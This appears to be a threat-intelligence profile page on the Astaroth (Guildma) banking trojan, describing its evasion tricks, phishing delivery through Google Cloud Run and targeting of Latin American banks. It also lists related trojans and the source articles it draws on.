Astaroth

Malware Profile Updated 3 months ago

Download STIX

Preview STIX

Astaroth, a malicious software (malware), has been identified as a significant threat due to its highly developed evasive skills and information stealing capabilities. This malware infects systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt operations, or hold data hostage for ransom. The Astaroth Trojan campaign specifically targets Avast's aswrundll.exe process and uses an external feature, NetPass, for additional information theft. In previous versions of this campaign, cerutil was used to download files, indicating a possible evolution in the malware's methodology. Cybersecurity researchers have issued warnings about a surge in email phishing campaigns using Google Cloud Run service to deliver banking trojans like Astaroth, Mekotio, and Ousaban. These attacks have targeted victims across Latin America and Europe since September 2023. More than 300 financial organizations have already fallen victim to the Astaroth trojan, also known as Guildma. Notably, Mekotio, delivered in the later stages of Astaroth attacks, permits browser manipulation and theft of banking credentials and personal data. The misuse of Google Cloud Run in these high-volume malware distribution campaigns is particularly concerning. The latest variant of Astaroth has targeted over 300 institutions across 15 Latin American countries, making it one of the most widespread malware campaigns in recent history. Some of the highest volume campaigns were observed delivering Astaroth, Mekotio, and Ousaban banking trojans, primarily to victims located in Latin America. The scale and sophistication of these attacks underscore the evolving threat landscape and the need for increased vigilance in cybersecurity measures.

What's your take? (Question 1 of 5)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.

ID	Votes	Profile Description
Guildma	1	Guildma is a malicious software (malware) that has been operational since at least 2015, initially targeting banking users exclusively from Brazil. Over time, this malware, alongside others such as Javali, Melcoz, and Grandoreiro, expanded its operations to target banks in other countries including

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Malware

Google

Cisco

Trojan

Phishing

Evasive

Exploit

Antivirus

Talos

Europe

Banking

Payload

Avast

Windows

Cybereason

Malware Payl...

Spam

Associated Malware

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
Ousaban	Unspecified	2	Ousaban is a malicious software, or malware, specifically a banking trojan developed primarily in Delphi. This harmful program is designed to exploit and damage computer systems, often infiltrating them via suspicious downloads, emails, or websites without the user's knowledge. Once inside, Ousaban
Mekotio	Unspecified	1	Mekotio is a sophisticated and persistent banking trojan that has primarily targeted Latin American countries since at least 2015. This malware, designed to exploit and damage computer systems, typically spreads through phishing emails that employ social engineering tactics. Once inside a system, Me
Javali	Unspecified	1	Javali is a multistage malware that has been active since November 2017, primarily targeting customers of financial institutions in Portuguese- and Spanish-speaking countries, with a particular focus on Brazil and Mexico. Part of a group of banking trojans including Guildma, Melcoz, and Grandoreiro,

Associated Threat Actors

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
No associations to display

Associated Vulnerabilities

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
No associations to display

Source Document References

Information about the Astaroth Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source	CreatedAt	Title
CERT-EU	5 months ago	Google Cloud Run Abused in Massive Banking Trojan Operation
CERT-EU	5 months ago	Banking Trojans Target Latin America and Europe Through Google Cloud Run
CERT-EU	5 months ago	High-volume malware campaigns involve Google Cloud Run exploitation
CERT-EU	5 months ago	TikTok’s latest actions to combat misinformation shows it’s not just a U.S. problem
CERT-EU	5 months ago	Hackers abuse Google Cloud Run in massive banking trojan campaign
DARKReading	5 months ago	Google's Cloud Run Service Spreads Several Bank Trojans
CERT-EU	a year ago	InfoSec Handlers Diary Blog - SANS Internet Storm Center
Unit42	7 months ago	From DarkGate to AsyncRAT: Malware Detected and Shared As Unit 42 Timely Threat Intelligence
MITRE	a year ago	Astaroth Malware Uses Legitimate OS and Antivirus Processes to Steal Passwords and Personal Data
MITRE	a year ago	Seeing a Resurgence of Demonic Astaroth WMIC Trojan \| Cofense